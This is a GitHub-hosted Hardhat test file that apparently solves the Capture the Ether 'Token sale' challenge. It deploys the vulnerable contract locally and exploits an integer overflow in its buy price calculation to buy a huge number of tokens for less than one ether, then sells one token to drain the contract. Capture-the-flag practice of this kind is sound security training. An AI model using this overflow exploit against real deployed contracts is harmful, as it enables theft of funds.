generated from nicobevilacqua/hardhat-solidity-typescript-boilerplate
-
Notifications
You must be signed in to change notification settings - Fork 1
/
TokenSaleChallenge.test.ts
50 lines (40 loc) · 1.52 KB
/
TokenSaleChallenge.test.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import { SignerWithAddress } from '@nomiclabs/hardhat-ethers/signers';
import { expect } from 'chai';
import { Contract } from 'ethers';
import { ethers, network } from 'hardhat';
const { utils, constants } = ethers;
describe('TokenSaleChallenge', () => {
let target: Contract;
let owner: SignerWithAddress;
let attacker: SignerWithAddress;
before(async () => {
[owner, attacker] = await ethers.getSigners();
const targetFactory = await ethers.getContractFactory('TokenSaleChallenge');
target = await targetFactory.deploy(attacker.address, {
value: utils.parseEther('1'),
});
await target.deployed();
console.log('Target deployed to:', target.address);
});
it('exploit', async () => {
const MAX_UINT256_VALUE = constants.MaxUint256; // (2**256 - 1)
const TOKEN_PRICE = utils.parseEther('1'); // (10**18)
const ETH_TO_STEAL = MAX_UINT256_VALUE.mod(TOKEN_PRICE);
const TOKENS_TO_BUY = MAX_UINT256_VALUE.sub(ETH_TO_STEAL).div(TOKEN_PRICE).add(1);
const ETHER_TO_SEND = TOKEN_PRICE.sub(ETH_TO_STEAL).sub(1);
console.log('TOKENS_TO_BUY:', TOKENS_TO_BUY.toString());
console.log('ETHER_TO_SEND:', ETHER_TO_SEND.toString());
let tx;
console.log('buying tokens');
tx = await target.connect(attacker).buy(TOKENS_TO_BUY, {
value: ETHER_TO_SEND,
});
await tx.wait();
console.log('selling tokens');
tx = await target.connect(attacker).sell(1);
await tx.wait();
});
after(async () => {
expect(await target.isComplete()).to.equal(true);
});
});